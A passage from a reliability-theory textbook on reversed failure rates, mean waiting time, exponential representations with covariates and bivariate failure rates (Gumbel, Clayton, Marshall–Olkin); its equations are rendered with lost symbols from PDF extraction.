stated earlier, the failure rate plays a crucial role in reliability and survival analysis. The interpretation of O (t)dt as the conditional probability of failure of an item in (t , t  dt ] given that it did not fail before in [0, t ] is meaningful. It describes the chances of failure of an operable object in the next infinitesimal interval of time. The reversed failure (hazard) rate (RFR) function was introduced by von Mises in 1936 (von Mises, 1964). It has been largely ignored in the literature primarily because it was believed that this function did not have the strong intuitive probabilistic content of the failure rate (Marshall and Olkin, 2007). In the next section, we will show that it still has an interesting probabilistic meaning, although not similar to that of the ‘ordinary’ failure rate. Most likely owing to this meaning, the properties of the reversed failure rate have attracted considerable interest among researchers (Block et al., 1998; Chandra, and Roy, 2001; Gupta and Nanda, 2001; Finkelstein, 2002, to name a few). Here we will only consider definitions and some 40 Failure Rate Modelling for Reliability and Risk of the simplest general properties. For more details, the reader is referred to the above-mentioned papers and references therein. Definition 2.4. The RFR U (t ) is defined by the following equation: f (t ) . F (t ) U (t ) (2.55) Thus, U (t) dt can be interpreted as an approximate probability of a failure in (t  dt , t ] given that the failure had occurred in [0, t ] . Similar to exponential representation (2.5), it can be easily shown solving, for instance, the elementary differential equation F c(t ) U (t ) F (t ) with the initial condition F (0) 0 that the following analogue of (2.5) holds: F (t ) ½° ­° f exp® U (u )du ¾ °¿ °¯ t ³ (2.56) and that the corresponding pdf is given by ½° ­° U (t ) exp® ³ U (u )du ¾ . °¿ °¯ t f f (t ) Therefore, U (t ) defines another characterization for the absolutely continuous Cdf F (t ) . Note that for proper lifetime distributions, f f ³ U (u)du f, which means that ³ U (u)du z f, t ! 0 , (2.57) t 0 lim t o0 U (t ) f, and F (0) 0 should also be understood as the corresponding limit. Unlike O (t ) , the RFR U (t ) cannot be a constant or an increasing function in (a, f), a t 0 . It is easy to verify that (2.57) holds, e.g., for the power function U (t ) t D , D ! 1 . After a simple transformation, the following relationship between U (t ) and O (t ) can be obtained: U (t ) O (t ) F (t ) 1  F (t ) 1 ( F (t )) 1  1 O (t ) . t ­° ½° exp® O (u )du ¾  1 °¯ 0 °¿ O (t ) ³ Let, e.g., O (t ) be a constant: O (t ) O . In accordance with Equation (2.58), (2.58) Failure Rate and Mean Remaining Lifetime U (t ) 41 O , exp^Ot`  1 and therefore, U (t ) decreases exponentially as t o f , whereas its behaviour for t o 0 is defined by the function t 1 . It follows from Equation (2.58) that if O (t ) is decreasing, then U (t ) is also decreasing. For t o f , Equation (2.55) can be written asymptotically as U (t ) f (t )(1  o(1)) . Thus U (t ) and f (t ) are asymptotically equivalent, which means that the study of the RFR function is relevant only for finite time. Example 2.6 Consider a series system of two independent components with survival functions F1 (t ), F2 (t ) , failure rates O1 (t ), O2 (t ) and RFRs U1 (t ), U 2 (t ) , respectively. As the survival function of the system in this case is the product of the components’ survival functions Fs (t ) F1 (t ) F2 (t ) , it follows from (2.5) that Os (t ) O1 (t )  O2 (t ) , where Os (t ) denotes the failure rate of the system. On the other hand, Fs (t ) can be written in terms of the RFRs as Fs (t ) 1  F1 (t ) F2 (t ) § ­° f ½° · ­° f ½° ·§ 1  ¨1  exp® U 1 (u )du ¾ ¸¨1  exp® U 2 (u )du ¾ ¸ , ¨ °¯ t °¿ ¸¹ °¯ t °¿ ¸¹¨© © ³ ³ (2.59) and the system’s RFR can be obtained using Definition 2.4. This will be a much more cumbersome expression than the self-explanatory O1 (t )  O2 (t ) . Using the same notation, consider now a parallel system of two independent components. The failure rate of this system is defined by the distribution Fi (t ) F2 (t ) which, similar to (2.59), does not give a ‘nice’ expression for Os (t ) . The RFR for this system, however, is simply the sum of individual reversed failure rates, i.e., U s (t ) U1 (t )  U 2 (t ) , which can be seen by substituting (2.56) into the product F1 (t ) F2 (t ) . A similar result is obviously valid for more than two independent components in parallel. Remark 2.4 It is well known that the probability that the i th component is the cause of the failure of the series system described in Example 2.6 (given that this failure had occurred in (t , t  dt ] ) is Oi (t ) / Os (t ), i 1,2 . It can easily be seen, however (Cha and Mi, 2008), that a similar relationship holds for the probability that the i th component is the last to fail in the described parallel system (given that the failure of a system had occurred in (t , t  dt ] ) and that probability is U i (t ) / U s (t ), i 1,2 . The foregoing reasoning indicates that some characteristics of parallel systems can be better described via the RFR than via the ‘ordinary’ failure rate. 42 Failure Rate Modelling for Reliability and Risk 2.5.2 Waiting Time It turns out that the RFR is closely related to another important lifetime characteristic: the waiting time since failure. Indeed, as the condition of a failure in [0, t ] is already imposed in the definition of the RFR, it is of interest in different applications (reliability, actuarial science, survival analysis) to describe the time that has elapsed since the failure time T to the current time t . Denote this random variable by Tw,t . Similar to (2.3), the corresponding survival function with support in [0, t ] (Finkelstein, 2002b) is P{t  T ! x | T d t} Fw,t ( x) F (t  x) , x  [0, t ] , F (t ) (2.60) and the corresponding pdf is f (t  x) , x  [0, t ] , F (t ) f w,t ( x) which, taking into account (2.55), leads to an intuitively evident relationship U (t ) f w,t (0) . Similar to Equation (2.7): Definition 2.5. The mean waiting time (MWT) function mw (t ) for an item that had failed in the interval [0, t ] is t mw (t ) { E[Tw,t ] ³F w,t (u )du 0 t ³ F (u)du 0 F (t ) . (2.61) Assume that mw (t ) is differentiable. Differentiating (2.61) and similar to (2.9), the following equation is obtained: mcw (t ) 1  U (t )mw (t ) . (2.62) Equivalently, U (t ) 1  mcw (t ) . mw (t ) (2.63) Substituting the RFR defined by Equation (2.63) into the right-hand side of Equation (2.56), we arrive at the exponential representation for the Cdf F (t ) , which can also be considered as another characterization of the absolutely continuous distribution function via the MWT function mw (t ) : Failure Rate and Mean Remaining Lifetime ­° f 1  mcw (u ) ½° exp® du ¾ . °¯ t mw (u ) °¿ ³ F (t ) 43 (2.64) Remark 2.5 Sufficient conditions for the function mw (t ) to be a MWT function for some proper lifetime distribution are similar to the corresponding conditions for the MRL function in Section 2.2. Note that the properties of mw (x) and m(x) differ significantly, which can be illustrated by the following example. Example 2.7 Let O (t ) O . Then m(t ) O1 , whereas t ³ F (u)du mw (t ) 0 F (t ) t  O1 (exp{Ot}  1) . 1  exp{Ot} It can be shown that sign(mcw (t )) sign(exp{Ot}  1  Ot ) ! 0 , and therefore mw (t ) is increasing in t  [0, f) . Transform (2.61) in the following way: t ³ mw (t ) t ³ F (u )du t  F (u )du F (t ) 1  F (t ) 0 0 , (2.65) and, as usual, assume that E[T ] m(0)  f . Then (2.65) results in the following asymptotic relationship: mw (t ) (t  m(0))(1  o(1)) , t of. As m(0) m is the mean time to failure, this relationship means that for t sufficiently large, mw (t ) is approximately equal to the corresponding unconditional mean waiting time, when the condition that the failure had occurred in [0, t ] is not imposed. This result is intuitively evident. 2.6 Chapter Summary In this chapter, we have discussed the definitions and basic properties of the failure rate, the mean remaining lifetime function and of the reversed failure rate. These facts are essential for our presentation in the following chapters. Exponential representation (2.5) for an absolutely continuous Cdf via the corresponding failure rate 44 Failure Rate Modelling for Reliability and Risk plays an important role in understanding, interpreting and applying reliability concepts. We have considered a number of lifetime distributions which are most popular in applications. Complete information on the subject can be found in Johnson et al. (1994, 1995). The classical Glaser result (Theorem 2.3) helps to analyse the shape of the failure rate, which is important for understanding the ageing properties of distributions. Various generalizations and extensions can be found, e.g., in Lai and Xie (2006). The shape of the failure rate can also be analysed using properties of underlying stochastic processes (Aalen and Gjeissing, 2001). Some examples of this approach are considered in Chapter 10. In Section 2.4.1, several of the simplest, most popular classes of ageing distributions were defined. It is clear that the IFR ( O (t )  I) property is the simplest and the most natural one for describing deterioration. On the other hand, the decreasing in time mean remaining lifetime also shows a monotone deterioration of an item. Note that Theorem 2.5 states that the decreasing MRL defines a more general type of ageing than the increasing failure rate. The properties of the reversed failure (hazard) rate have recently attracted considerable interest. Although the corresponding definition seems to be rather artificial, the concept of the waiting time described in Section 2.5.2 makes it relevant for reliability applications. Another possible advantage of the reversed failure rate is that the analysis of parallel systems can usually be simpler using this characteristic than using the ‘ordinary’ failure rate. 3 More on Exponential Representation The importance of exponential representation (2.5) was already emphasized in Section 2.1. In this chapter, we will consider two meaningful generalizations: the exponential representation for lifetime distributions with covariates and an analogue of the exponential representation for the multivariate (bivariate) case. The first generalization will be used in Chapter 6 for modelling of mixtures and in the last chapter on applications to demography and biological ageing. Other chapters do not directly rely on this material and can therefore be read independently. The bivariate case will also be considered only in Chapter 7, where the competing risks model of the current chapter will be discussed for the case of correlated covariates. 3.1 Exponential Representation in Random Environment 3.1.1 Conditional Exponential Representation In statistical reliability analysis, the lifetime Cdf F (t ) Pr[T d t ] is usually estimated on the basis of the failure times of items. On the other hand, there can be other information available and it is unreasonable not to use it. Possible examples of this additional information are external conditions of operation, observations of internal parameters or expert opinions on the values of parameters, etc. Assume that our item is operating in a random environment defined by some (covariate) stochastic process Z t , t t 0 (e.g., an external temperature, an electric or mechanical load or some other stress factor). This is often the case in practice. Similar to Equation (2.4), we can formally define (Kalbfleisch and Prentice, 1980) the following conditional failure rate (given a realization of the process in [0, t ] z (u ), 0 d u d t ): O (t | z (u ), 0 d u d t ) lim 't o0 Pr[t  T d t  't | z (u ), 0 d u d t ; T ! t ] . 't (3.1) This failure rate is obtained for a realization of the covariate process. Strictly speaking, this is not yet a failure rate as defined by Equation (2.4), but rather a 46 Failure Rate Modelling for Reliability and Risk conditional risk or conditional hazard. Whether it will become a ‘fully-fledged’ failure rate depends on the answer to the following question: does an analogue of exponential representation (2.5) hold for realizations z (u ), 0 d u d t ? Pr[T ! t | z (u ), 0 d u d t ] { F (t | z (u ), 0 d u d t ) ½° ­° t exp® ³ O (u | z ( s ), 0 d s d u )du ¾. °¿ °¯ 0 (3.2) When the answer is positive, Equation (3.2) holds and O (t | z (u ), 0 d u d t ) becomes the ‘real’ failure rate. This topic was addressed by Kalbfleisch and Prentice (1980) and has been treated on a technical level using a martingale approach in Yashin and Arjas (1988), Yashin and Manton (1997), Aven an Jensen (1999), Singpurwalla and Wilson (1995, 1999) and Kebir (1991). One can find the necessary mathematical details in these references. We, however, will consider this important issue on a heuristic, descriptive level (Finkelstein, 2004b). An obvious condition for a positive answer is that F (t | z (u ), 0 d u d t ) should be an absolutely continuous Cdf. In this case, as follows from Section 2.1, the corresponding conditional failure rate O (t | z (u ), 0 d u d t ) exists. As this property can depend on the environment, it brings into consideration the issue of external and internal covariates. The notions of external and internal covariates are important for survival analysis and reliability theory. As is traditionally done, define the covariate process Z t , t t 0 as external if it may influence but is itself not influenced by the failure process of the item. On the other hand, internal covariates are those that directly convey information about the item’s survival (e.g., failed or not). In accordance with this useful interpretation (Fleming and Harrington, 1991), the failure time of our item T is a stopping time for the process Z t , t t 0 if the information in the history z (u ), 0 d u d t specifies whether an event described by the lifetime random variable T has happened by time t . Therefore, T is not a stopping time for the external covariate process Z t , t t 0 and is usually a stopping time for an internal process. For strict mathematical definitions, the reader is referred to, e.g., Aven and Jensen (1999). Examples of internal covariates are blood pressure or body temperature, which when observed as being below a certain level indicate that the individual is not alive. If we are observing a damage accumulation process and the failure occurs when it reaches some predetermined level, then this process also can be considered as an internal covariate. An example of an external covariate in the context of life sciences is the level of radiation individuals are subjected to (Singpurwalla and Wilson, 1999) or the external temperature and humidity in reliability testing. Let the time-to-failure Cdf of an item in some baseline, deterministic (and, for simplicity, univariate) environment zb (t ) be absolutely continuous, which means that the corresponding baseline failure rate Ob (t ) { O (t | zb (u ), 0 d u d t ) exists. Let also the influence of the external stochastic covariate process, which models the real operational environment of the component, be weak (smooth) in the sense that the resulting conditional failure rate exists. For instance, if this influence could be modelled via realizations z (t ) directly, e.g., by the proportional hazards model z (t )Ob (t ) , the additive hazards model z (t )  Ob (t ) or the accelerated life model Ob ( z (t )) , then automatically, as the failure rate exists, the corresponding Cdf More on Exponential Representation 47 F (t | z (u ), 0 d u d t ) is absolutely continuous. Note that these three models are very popular in reliability and survival analysis and have been intensively studied in the literature. We will consider all of them in Chapters 6 and 7. However, if, for instance, a jump in z (t ) leads to an item’s failure with some non-infinitesimal probability (and it is often the case in practice when, e.g., a jump in a stress occurs), then the corresponding Cdf F (t | z (u ), 0 d u d t ) is not absolutely continuous and Equation (3.2) does not hold. A jump of this kind indicates a strong influence of the external covariate on the item’s failure process. Remark 3.1 Assume first that Z t , t t 0 specifies the complete information about the failure process. Conditioning on the trajectory of the internal covariate of this kind results in a distribution function that is not absolutely continuous. More technically- the stopping time T in this case is a predictable one (Aven and Jensen, 1999) and exponential representation (3.2) does not hold. If, for example, z (t ) is increasing and the failure of an item occurs when z (t ) reaches a positive threshold, then T in this realization is deterministic and therefore, not absolutely continuous. On the other hand, assume now that observation of Z t , t t 0 does not provide a complete description of the item’s state. More technically, the stopping time T is totally inaccessible (in other words ‘sudden’) in this case (Aven and Jensen, 1999). It turns out that exponential representation (3.2) could be valid. The corresponding examples are considered in Finkelstein (2004b). A model of an unobserved overall resource in Section 10.2 also offers a relevant example. 3.1.2 Unconditional Exponential Representation Let Z t , t t 0 be, as in the previous section, an external covariate process and assume that conditional exponential representation (3.2) holds. Now we want to obtain the corresponding unconditional characteristic, which will be called the observed (marginal) representation. As Equation (3.2) holds for realizations z (t ) of the covariate process Z t , t t 0 , the observed survival function is obtained formally as the following expectation with respect to Z t , t t 0 : F (t ) ª ­° t ½°º E «exp® O (u | Z s , 0 d s d u )du ¾» . °¿»¼ «¬ °¯ 0 ³ (3.3) Equation (3.3) can be written in compact form as F (t ) ª ­° t ½°º E «exp® Ou du ¾» , °¿»¼ «¬ °¯ 0 ³ (3.4) where Ou O (u | Z s , 0 d s d u ) is usually (Kebir, 1991; Aven and Jensen, 1999) referred to as the hazard (failure) rate process (or random failure rate). A similar notion for repairable systems is usually called the intensity process (stochastic intensity). It will be defined in the next chapter for general point processes without multiple occurrences. 48 Failure Rate Modelling for Reliability and Risk There is a slight temptation to obtain the observed failure rate O (t ) as E[Ou ] , but obviously it is not true, as the failure rate itself is a conditional characteristic. Therefore, if we want to write Equation (3.4) in terms of the expectation of the hazard rate process Ou O (u | Z s , 0 d s d u ) , it should be done conditionally on survival in [0, t ] , i.e., F (t ) ­° t °½ exp® E >Ou | T ! u @du ¾ , °¯ 0 °¿ ³ (3.5) where Ot | T ! t , t t 0 denotes the conditional hazard rate process (on condition that the item did not fail in [0, t ) ). Thus, taking into account exponential representation (2.5), the definition of the observed failure rate O (t ) via the conditional hazard rate process can formally be written as O (t ) E >Ou | T ! t @ . (3.6) We have presented certain heuristic considerations for obtaining this very important result, which will often be used in this book for different settings. The strict mathematical proof can be found in Yashin and Manton (1997). The meaning of the ‘compact’ Equation (3.6) will become more evident when considering the examples in the next section. As the exponential function is a convex one, Jensen’s inequality can be used for obtaining the lower (conservative) bound for F (t ) in Equation (3.4), i.e., ­° t ½° F (t ) t exp® E[Ou ]du ¾ . °¯ 0 °¿ ³ (3.7) Note that the expectation in (3.7) is defined with respect to the process Ot , t t 0 (see Equation (6.3) and the corresponding discussion). Computations, in accordance with Equations (3.5) and (3.6), are usually cumbersome and can be performed explicitly only in a few special cases. Some meaningful examples are considered in the next section. These examples will be used throughout this book. 3.1.3 Examples Example 3.1 Consider a special case of Model (3.3)–(3.5) when Z t { Z is a positive random variable (external covariate) with the pdf S (z ) . It is convenient now to use different notation for the conditional failure rate, i.e., O (t | Z z ) { O (t , z ) , which means that the failure rate is indexed by the parameter z . This example is crucial for the presentation of Chapter 6 and we will often refer to it. The conditional Cdf F (t , z ) can be obtained via O (t , z ) using the corresponding exponential representation. As usual, f (t , z ) Ftc(t , z ) . The observed (mixture) F (t ) and f (t ) are given by the following expectations: More on Exponential Representation 49 t ³ F (t , z)S ( z )dz, F (t ) 0 t ³ f (t , z)S ( z )dz, f (t ) 0 respectively. In accordance with the definition of the failure rate (2.4), the observed (mixture) failure rate can be defined directly as f ³ f (t, z)S ( z )dz O (t ) 0 f . (3.8) ³ F (t, z )S ( z )dz 0 Using the general relationship f (t ) O (t ) F (t ) , it is easy to transform formally the observed failure rate (3.8) into the conditional form (2.11) (Lynn and Singpurwalla, 1997; Finkelstein and Esaulova, 2001): f O (t ) ³ O (t, z )S ( z | t )dz , (3.9) 0 where S ( z | t ) denotes the conditional pdf of Z on condition that T ! t , i.e., S (z | t) S ( z ) F (t , z ) f . (3.10) ³ F (t , z )S ( z )dz 0 Equation (3.9) is an explicit form of Equation (3.6) for the special case under consideration. Thus, S ( z | t )dz is the conditional probability that a realization of the covariate random variable Z belongs to the interval ( z  dz ] on condition that T ! t . As Z is an external covariate, this is just the product of S ( z)dz and of the following probability: Pr[T ! t ] F (t , z ) f . ³ F (t , z )S ( z )dz 0 This useful interpretation explains the simple and self-explanatory form of the observed failure rate given by Equation (3.9). Example 3.2 In this example, we assume a specific form of O (t , z ) and choose the corresponding specific distributions. Let O (t , z ) zOb (t ) , 50 Failure Rate Modelling for Reliability and Risk where Ob (t ) is the failure rate of an item in a baseline environment. Let Z be a gamma-distributed random variable (Equation (2.22)) with shape parameter D and scale parameter E and let Ob (t ) J t J 1 , J ! 1 be the increasing failure rate of the Weibull distribution (in a slightly different notation to that of (2.25)). The observed failure rate O (t ) in this case, can be obtained by the direct integration in Equation (3.8), as in Finkelstein and Esaulova (2001) (see also Gupta and Gupta, 1996): DEJ t J 1 . 1 E tJ O (t ) (3.11) Note that the shape of O (t ) in this case differs dramatically from the shape of the increasing baseline failure rate Ob (t ) . This function is equal to 0 at t 0 , increases to a maximum at 1 § J 1·J ¨¨ ¸¸ © E ¹ t max and then decreases to 0 as t o f . 0.1 β = 0.04 λ(t) 0.08 β = 0.01 0.06 0.04 β = 0.005 0.02 0 0 5 10 15 20 25 30 35 t Figure 3.1. The observed failure rate for the Weibull baseline distribution, J 2, D 1 Example 3.3 Assume that Z is a non-negative discrete random variable with the probability mass S ( z k ) at z z k , k t 1 . Then: F (t ) ¦ F (t, z )S ( z ) , k k k More on Exponential Representation f (t ) 51 ¦ f (t, z )S ( z ) k k k and Equations (3.8)–(3.9) are transformed into O (t ) ¦ f (t , z )S ( z ) O (t , z )S ( z ¦ F (t , z )S ( z ) ¦ k k k k k k k | t )dz , (3.12) k k where S k (z | t) S ( z k ) F (t , z k ) ¦ F (t, zk )S ( zk ) (3.13) k is the conditional (on condition that T ! t ) probability mass at z z k . In Example 10.1 of Chapter 10, devoted to demographic applications, we use Equation (3.12) for obtaining the observed failure (mortality) rate of a parallel system of Z N , N 1,2,... i.i.d. components with exponentially distributed lifetimes. The distribution of N in this case follows the Poisson law on condition that the system is operating at t 0 , which means that N z 0 . Example 3.4 Assume that the random failure rate Ot , t t 0 is defined by the Poisson process with rate O . The definition and simplest properties of the Poisson process are given in Section 4.3.1. Realizations of this process are non-decreasing step functions with unit jumps. They can be caused, e.g., by the corresponding jumps in a stress applied to an item. The following is obtained by direct computation (Grabski, 2003): F (t ) ª ­° t ½°º E «exp® ³ Ou du ¾» °¿¼» ¬« °¯ 0 exp{O (t  1  exp{t})} . (3.14) O (t ) O (1  exp{t}) (3.15) This means that is the observed failure rate in this case. It follows from Equation (3.15) that O (0) 0, lim t of O (t ) O , which agrees with the intuitive reasoning for this setting. 52 Failure Rate Modelling for Reliability and Risk 3.2 Bivariate Failure Rates and Exponential Representation This book is mostly devoted to ‘univariate reliability’. In this section, however, we will show how the failure rate and the exponential representation can be generalized to multivariate distributions. We will mostly consider the bivariate case and will only remark on the multivariate case where appropriate. The importance of the failure rate and of the exponential representation for the univariate setting was already discussed in this chapter, as well as in previous chapters. In the multivariate case, however, the corresponding generalizations, although meaningful, usually do not play a similar pivotal role. This is because now there is no unique failure rate and because the probabilistic interpretations of the corresponding notions are often not as simple and appealing as in the univariate case. 3.2.1 Bivariate Failure Rates The univariate failure rate O (t ) of an absolutely continuous Cdf F (t ) uniquely defines F (t ) via exponential representation (2.5). The situation is more complex in the bivariate case. In this section, we will consider an approach to defining multivariate analogues of the univariate failure rate function, which can be used in applications related to analysis of data involving dependent durations. Other relevant approaches and results can be found in Barlow and Proschan (1975), Block and Savits (1980) and Lai and Xie (2006), among others. Let T1 t 0, T2 t 0 be the possibly dependent random variables (describing lifetimes of items) and let F (t1 , t 2 ) Fi (ti ) Pr[T1 d t1 , T2 d t 2 ] , Pr[Ti d ti ], i 1,2 be the absolutely continuous bivariate and univariate (marginal) Cdfs, respectively. For convenience and following the conventional notation (Yashin and Iachine, 1999), denote the bivariate (joint) survival function by S (t1 , t 2 ) { Pr[T1 ! t1 , T2 ! t 2 ] 1  F1 (t1 )  F2 (t 2 )  F (t1 , t 2 ) (3.16) and the univariate (marginal) survival functions Fi (t ), i 1,2 with the corresponding failure rates Oi (ti ), i 1,2 by S1 (t1 ) { Pr[T1 ! t1 , T2 ! 0] Pr[T1 ! t1 ] S (t1 ,0), S 2 (t 2 ) { Pr[T1 ! 0, T2 ! t 2 ] Pr[T2 ! t 2 ] S (0, t 2 ), respectively. It is natural to define the bivariate failure rate, as in Basu (1971), generalizing the corresponding univariate case: More on Exponential Representation O (t1 , t 2 ) lim 't ,'t o0 1 2 53 Pr(t1 d T1  t1  't1 , t 2 d T2  t 2  't 2 | T1 ! t1 , T2 ! t 2 ) 't1't 2 f (t1 , t 2 ) . S (t1 , t 2 ) (3.17) Thus, O (t1 , t2 )dt1dt2  o(dt1dt2 ) can be interpreted as the probability of the failure of both items in intervals of time [t1 , t1  dt1 ), [t 2 , t 2  dt 2 ) , respectively, on the condition that they did not fail before. It is convenient to use reliability terminology in this context, although other interpretations can be employed as well. Equation (3.17) can be written as f (t1 , t2 ) O (t1 , t2 ) S (t1 , t2 ) , which resembles the univariate case, but the solution to this equation is not defined and therefore cannot be written in a form similar to (2.5). Therefore, a different approach should be developed. Remark 3.2 Note that, although the failure rate O (t1 , t 2 ) does not define F (t1 , t2 ) in closed form (e.g., in the desired form of some exponential representation), it can be proved that under some additional assumptions (Navarro, 2008) it uniquely defines the bivariate distribution F (t1 , t 2 ) . Two types of conditional failure rates associated with F (t1 , t2 ) play an important role in applications related to analysis of data involving dependent durations (Yashin and Iachine, 1999): Oi (t1 , t 2 ) lim 't o0  w ln S (t1 , t 2 ); i 1,2 , wti Oˆi (t1 , t2 ) lim 't o0  1 Pr(t i d Ti  t i  't | T1 ! t1 , T2 ! t 2 ) 't 1 Pr(ti d Ti  ti  't | Ti ! ti , T j 't · w §¨ w ln  S (ti , t j ) ¸; i, j 1,2, i z j . ¨ ¸ wti © wt j ¹ (3.18) tj) (3.19) These univariate failure rates describe the chance of failure at age t of the i th item given the failure history of the j th item ( i, j 1,2, i z j ). For instance, O1 (t1 , t2 )dt can be interpreted as the probability of failure of the first item in (t1 , t1  dt ] on the condition that it did not fail in [0, t1 ] and that the second item also did not fail in [0, t2 ] . Similarly, Oˆ1 (t1 , t2 )dt is the probability of failure of the first item in (t1 , t1  dt ] on the condition that it did not fail in [0, t1 ] and that the second item had failed in (t2 , t2  dt ] . The vector ( (O1 (t1 , t 2 ), O2 (t1 , t 2 )) sometimes 54 Failure Rate Modelling for Reliability and Risk is called the hazard gradient (Johnson and Kotz, 1975) and it has been shown that it uniquely defines the bivariate distribution F (t1 , t 2 ) . It is clear that if T1 and T2 are independent, then Oi (t1 , t 2 ) Oˆi (t1 , t 2 ) , whereas Oi (t1 , t 2 ) / Oˆi (t1 , t 2 ) can be considered as a measure of correlation between T1 and T2 in the general case. Failure rates (3.17) and (3.18) are already sufficient for obtaining an analogue of exponential representation (2.5). On the other hand, failure rate (3.19) is important in defining and understanding the dependence structure of bivariate distributions. Remark 3.3 The bivariate failure rate presented here can easily be generalized to the multivariate case n ! 2 (Johnson and Kotz, 1975). Remark 3.4 Similar to the hazard gradient vector (O1 (t1 , t2 ), O2 (t1 , t2 )) defined by Equation (3.18), the corresponding analogues for the conditional mean remaining lifetime functions exist (compare with Equation (2.7)), i.e., E[Ti  ti | T1 ! t1 , T2 ! t 2 ), i 1,2 . mi (t1 , t 2 ) It can be proved that these functions are connected to Oi (t1 , t 2 ) (Arnold and Zahedi, 1988) via the following relationships: O1 (t1 , t 2 ) 1  (w / wt1 )m1 (t1 , t 2 ) , m1 (t1 , t 2 ) O2 (t1 , t 2 ) 1  (w / wt 2 )m2 (t1 , t 2 ) . m2 (t1 , t 2 ) It has been shown by these authors that the vector ( m1 (t1 , t 2 ) , m2 (t1 , t 2 ) ) also uniquely defines the bivariate distribution F (t1 , t 2 ) . 3.2.2 Exponential Representation of Bivariate Distributions Any bivariate survival function can formally be represented by the following simple identity (Yashin and Iachine, 1999): S (t1 , t2 ) S1 (t1 ) S 2 (t2 ) exp{ A(t1 , t2 )} , (3.20) where A(t1 , t2 ) ln S (t1 , t2 ) . S1 (t1 ) S 2 (t2 ) Equation (3.20) can be easily proved taking the logs from both sides. It is clear that the function A(t1 , t 2 ) can be viewed as a measure of dependence between T1 and T2 . When these variables are independent, A(t1 , t 2 ) 0, t1 , t 2 t 0 . Lehmann (1966) discussed a similar ratio of distribution functions under the title “quadrant dependence”. The following result was proved in Finkelstein (2003d). More on Exponential Representation 55 Theorem 3.1. Let F (t1 , t 2 ) Pr[T1 d t1 , T2 d t 2 ] and Fi (ti ) Pr[Ti d ti ], i 1,2 be absolutely continuous bivariate and univariate (marginal) Cdfs, respectively. Then the following bivariate exponential representation of the corresponding survival function holds: S (t1 , t 2 ) ­° t1 ½° ­° t2 ½° exp® ³ O1 (u )du ¾ exp® ³ O2 (u )du ¾ °¯ 0 °¿ °¯ 0 °¿ ½° ­° t1 t2 u exp®³³ (O (u, v)  O1 (u, v)O2 (u, v))dudv ¾ , °¿ °¯ 0 0 (3.21) where Oi (u ) , i 1,2 are the failure rates of marginal distributions and the failure rates O (u , v) , Oi (u , v ) are defined by Equations (3.17) and (3.18), respectively. Proof. As Fi (ti ), i 1,2 and A(t1 , t 2 ) are absolutely continuous (Yashin and Iachine, 1999), S i (ti ) ­° ti °½ exp® ³ Oi (u )du ¾, °¯ 0 °¿ t1 t 2 A(t1 , t 2 ) (3.22) ³³ M (u, v)dudv, 0 0 where M (u , v) is some bivariate function. Rewrite Equation (3.20) in the following way: S (t1 , t 2 ) exp{ H (t1 , t 2 )} , (3.23) where t1 t2 0 0 ³ ³ H (t1 , t 2 ) { O1 (u )du  O2 (u )du  t1 t 2 ³³ M (u, v)dudv . 0 0 From the definitions of Oi (t1 , t2 ) and H (t1 , t 2 ) , the following useful relationship can be obtained: Oi (t1 , t 2 ) w H (t1 , t 2 ) wti w Oi (ti )  A(t1 , t 2 ), i 1,2. wti Differentiating both sides of this equation and using (3.18) and (3.22) yields (3.24) 56 Failure Rate Modelling for Reliability and Risk w2 A(t1 , t 2 ) wt1wt 2 f (t1 , t2 ) w w  ln S (t1 , t 2 ) ln S (t1 , t2 ) , S (t1 , t2 ) wt1 wt2 which, given our notation, can be written as (see also Gupta, 2003) M (u , v) O (u, v)  O1 (u , v)O2 (u, v) , (3.25) and eventually we arrive at the important exponential representation (3.21) of the bivariate survival function. Ŷ Before generalizing this result, let us consider several simple and meaningful examples. Example 3.5 Gumbel Bivariate Distribution This distribution is widely used in reliability and survival analysis. It defines a simple, self-explanatory correlation between two lifetime random variables. The survival function for this distribution is given by S (t1 , t2 ) exp{t1  t2  G t1t2 } , M (u, v) G , A(t1 , t2 ) (3.26) where 0 d G d 1 . Thus G t1t2 and Oi (t1 , t 2 ) 1  G t j ; i, j 1,2; i z j , O (t1 , t 2 ) G  (1  G t1 )(1  G t 2 ) , whereas the failure rates of the marginal distributions are Oi (t ) 1, i 1,2 . Note that the survival function for this distribution is already given by Equation (3.26) and we are just obtaining the corresponding failure rates. The next example, by contrast, is based on the relationship between the failure rates, which eventually defines the corresponding exponential representation. Example 3.6 Clayton Bivariate Distribution Let the dependence structure of the bivariate distribution be given by the following constant ratio: O (u, v) 1T , O1 (u , v)O2 (u, v) where T ! 1 . Equation (3.25) for this special case becomes M (u , v) TO1 (u , v)O2 (u , v) or, equivalently, (3.27) More on Exponential Representation T M (u , v) 1T O (u, v) . 57 (3.28) These equations describe a meaningful proportionality between different bivariate failure rates. For T ! 0 (positive correlation), the corresponding bivariate survival function is uniquely defined (up to marginal distributions), and it can be shown that the function H (t1 , t 2 ) is given by the following expression: § ­° t2 ½° · ­° t1 ½° H (t1 , t 2 ) T 1 ln¨ exp®T ³ O1 (u )du ¾  exp®T ³ O2 (u )du ¾  1¸ , ¨ °¯ 0 °¿ ¸¹ °¯ 0 °¿ © which eventually defines the well-known Clayton bivariate survival function (Clayton, 1978; Clayton and Cusick, 1985): S (t1 , t2 ) S (t ) 1 T  S (t2 ) T  1  1 T . (3.29) This family of distributions was also studied by Cox and Oakes (1984), Cook and Johnson (1986), Oakes (1989) and Hougaard (2000), to name a few. With appropriate marginals, it can define several well-known bivariate distributions (e.g., bivariate logistic distribution of Gumbel (1960), the bivariate Pareto distribution of Mardia (1970)). Example 3.7 Marshall–Olkin Bivariate Distribution This distribution is defined by the following survival function: S (t1 , t2 ) exp{O1t1  O2t2  O12 max(t1 , t2 )} , (3.30) where O1 , O2 , O12 are positive constants. It cannot be transformed into a form defined by Equation (3.21), as it is not absolutely continuous since max(ti , t2 ) cannot be written as t1 t 2 ³³ M (u, v)dudv 0 0 for some bivariate function M (u , v) . A rather general bivariate distribution can be constructed using exponential representation (3.21) and additional ‘coefficients of proportionality’. Consider the following bivariate function: SD1D 2E1E 2 (t1 , t 2 ) ­° t1 t2 °½ D D S1 1 (t1 ) S 2 2 (t 2 ) exp®³³ ( E1O (u, v)  E 2 O1 (u , v)O2 (u , v))dudv ¾ , °¯ 0 0 °¿ where D i ! 0, E i t 0; i 1,2 . 58 Failure Rate Modelling for Reliability and Risk The following theorem states the sufficient conditions for the function 1  SD1D 2E1E 2 (t1 , t 2 ) to be a bivariate Cdf. It is a generalization of Theorem 1 in Yashin and Iachine (1999). Theorem 3.2. Let S (t1 , t 2 ) be a bivariate survival function defined by exponential representation (3.21). Let x E 2 t E1 ; x D i  E 2 t 0, i 1,2 ; x O (u , v) E t 2 ; 